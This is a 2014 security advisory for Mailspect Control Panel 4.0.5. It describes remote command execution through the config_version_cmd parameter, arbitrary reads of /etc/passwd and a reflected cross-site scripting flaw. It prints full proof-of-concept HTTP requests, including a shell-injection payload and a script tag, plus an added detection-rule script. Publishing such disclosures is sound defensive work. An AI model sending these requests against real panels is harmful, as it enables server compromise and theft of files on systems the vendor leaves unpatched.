Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Release Date:
===========
June 21, 2014
Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and SpamAssassin.
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quarantine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-PROT, Mailshell, and Sophos and built-in
content filters and reputation engines.
Abstract Advisory Information:
=======================
BGA Team discovered one remote code execution, two arbitrary file read and one cross-site scripting vulnerability in the Mailspect Control
Panel 4.0.5 web application.
Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.
Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with the config_version_cmd parameter's value set to a Linux command chain such as
"whoami > /tmp/who; /usr/local/MPP/mppd -v" causes the first command to be executed when a GET request is sent to (or one simply visits)
the "status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable as well.
2. Sending a GET request to "/monitor_logs_ctl.cgi" with the log_dir parameter's value set to "/" and the log_file parameter's value set
to an arbitrary file name such as "/etc/passwd" discloses that file's contents.
3. Sending a POST request to "/monitor_manage_logs.cgi" with the log_file parameter's value set to an arbitrary file name such as
"/etc/passwd" discloses that file's contents.
4. Sending a POST request to "/monitor_manage_logs.cgi" with the login parameter's value set to "></script>js to be executed<script/>
leads to execution of the JavaScript code.
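A request-level detection rule set covering the four issues above, as an added example rather than code from the advisory or the vendor. It assumes the panel's log directory is /var/log/MPP/ (the config_log_dir value in the RCE PoC) and that a proxy or WAF in front of the panel can hand it the method, request target and form body; the AFR rule also catches "../" traversal, which the advisory does not show.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

LOG_ROOT = "/var/log/MPP/"  # the panel's log directory, taken from config_log_dir in the RCE PoC (assumption)
SHELL_META = re.compile(r"[;&|`$<>\n]")  # command chaining, redirection, substitution
MARKUP = re.compile(r"[<>\"']")  # characters that break out of an HTML attribute or tag

def parse_request(method, target, body=""):
    """Return (METHOD, path, {param: [values]}) for a request target and optional form body."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    params.update(parse_qs(body, keep_blank_values=True))
    return method.upper(), parts.path, params

def findings(method, target, body=""):
    """Return the list of rule hits for one request; an empty list means no rule matched."""
    _, path, params = parse_request(method, target, body)
    hits = []
    # 1. RCE: a *_cmd setting posted to system_module.cgi must not carry shell control characters
    if path.endswith("/system_module.cgi"):
        for name, values in params.items():
            if name.endswith("_cmd") and any(SHELL_META.search(v) for v in values):
                hits.append(f"RCE: shell metacharacters in {name}")
    # 2./3. AFR: log_dir joined with log_file must stay inside LOG_ROOT after normalisation
    if path.endswith(("/monitor_logs_ctl.cgi", "/monitor_manage_logs.cgi")):
        log_dir = params.get("log_dir", [LOG_ROOT])[0]
        for name in params.get("log_file", []):
            resolved = posixpath.normpath(posixpath.join(log_dir, name))
            if not resolved.startswith(LOG_ROOT):
                hits.append(f"AFR: {resolved} is outside {LOG_ROOT}")
    # 4. XSS: the reflected login parameter must not contain markup characters
    for v in params.get("login", []):
        if MARKUP.search(v):
            hits.append("XSS: markup characters in login parameter")
    return hits

if __name__ == "__main__":
    # Constructed samples: the four PoC requests from this advisory (trimmed) plus one benign log request.
    samples = [
        ("POST", "/system_module.cgi", "post=1&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v"),
        ("GET", "/monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50", ""),
        ("POST", "/monitor_manage_logs.cgi", "group=default&post=1&log_file=/etc/passwd&download=Download"),
        ("GET", "/login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E", ""),
        ("GET", "/monitor_logs_ctl.cgi?log_file=mppd.log&log_dir=/var/log/MPP/", ""),
    ]
    for method, target, body in samples:
        print(method, target.split("?")[0], findings(method, target, body) or "clean")
```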
Proof of Concept (PoC):
==================
1. Proof of Concept RCE Request:
POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282

post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
2. Proof of Concept AFR Request 1:
GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
3. Proof of Concept AFR Request 2:
POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
4. Proof of Concept XSS Request:
GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Solution Fix & Patch:
================
The XSS will be patched in version 4.0.7.
According to the vendor's reply, there will be no patch for the RCE and AFR vulnerabilities.
Security Risk:
==========
The risk of the vulnerabilities above is estimated as high.
Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAŞ
Disclaimer & Information:
===================
The information provided in this advisory is provided as is, without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and fitness for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental or consequential loss of business profits or special damages.
Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA Security